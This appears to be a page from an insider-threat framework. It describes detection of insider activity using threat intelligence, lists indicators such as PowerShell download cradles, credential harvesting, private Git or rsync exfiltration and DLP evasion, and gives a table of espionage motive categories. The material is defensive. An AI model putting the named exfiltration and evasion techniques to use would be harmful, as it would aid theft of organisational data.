Detections

Leverage threat intelligence feeds that include insider-specific indicators—such as behavioral markers, tactics used by recruited insiders, anonymized exfiltration infrastructure, and social engineering methods—to enrich detection of internal threats. Unlike traditional TI feeds that focus on malware or external IPs, insider-focused feeds highlight tactics used to manipulate access, stage data, or coordinate with external actors.

Detection Methods:

Integrate insider-focused threat intelligence sources into SIEM, EDR, or UEBA platforms. These may include:

Indicators of misuse of collaboration tools (e.g., OneDrive, Slack, GitHub).
VPN or proxy services associated with known data exfiltration actors.
Identified techniques for bypassing DLP, such as stenography, encryption layering, or screen scraping.
Known burner email domains, decentralized file drop sites, or illicit data markets.

Use TI feeds that profile known insider operations—such as previously identified contractors or developers tied to state programs (e.g., North Korean contractor aliases).
Cross-reference internal behavior (e.g., file staging, privilege escalation, unusual scripting patterns) with threat actor TTPs derived from known insider incidents.
Monitor for command-line syntax, file naming conventions, or tools that match profiles of past insider incidents (e.g., private rsync use, exfil via private Git repos).

Indicators:

Use of anonymization tools or services commonly flagged in insider TI feeds.
Behavioral sequences (e.g., mass SharePoint access followed by personal cloud login) matching known insider TTPs.
Internal tool usage (e.g., Powershell download cradle, credential harvesting) found in TI reports of insider toolkits.
Unusual outbound traffic to infrastructure linked to past insider activity or hybrid APT/insider collaboration cases.

Examples of Insider-Focused TI Sources:

Sections

ID	Name	Description
MT017	Espionage	A subject carries out covert actions, such as the collection of confidential or classified information, for the strategic advantage of a nation-state.
MT017.001	Nation-State Alignment	The subject is a current or former asset of a nation-state intelligence service, operating inside the organization with pre-existing loyalty to, or direct affiliation with, a foreign government. Unlike insiders who develop espionage motives post-employment, this subject is often inserted, recruited prior to hiring, or cultivated externally over time and then encouraged to seek access to a target organization. Their motive is the advancement of strategic objectives on behalf of a foreign nation-state. These objectives may include extracting sensitive information, degrading operational resilience, manipulating internal systems or decisions, weakening public or partner trust, or embedding long-term access for future exploitation. Such subjects may be formal intelligence officers, contract operatives, ideological affiliates, or individuals acting under recruitment, coercion, or influence. Example Scenarios: A subject recruited during university by a foreign security service secures a role in a telecommunications provider and enables covert surveillance access for state-level eavesdropping. A subject hired into a biopharmaceutical firm has pre-existing links to a state-sponsored “talent program” and transfers research data to affiliated institutions abroad via covert cloud channels.
MT005.002	Corporate Espionage	A third party private organization deploys an individual to a target organization to covertly steal confidential or classified information or gain strategic access for its own benefit.
MT005.001	Speculative Corporate Espionage	A subject covertly collects confidential or classified information, or gains access, with the intent to sell it to a third party private organization.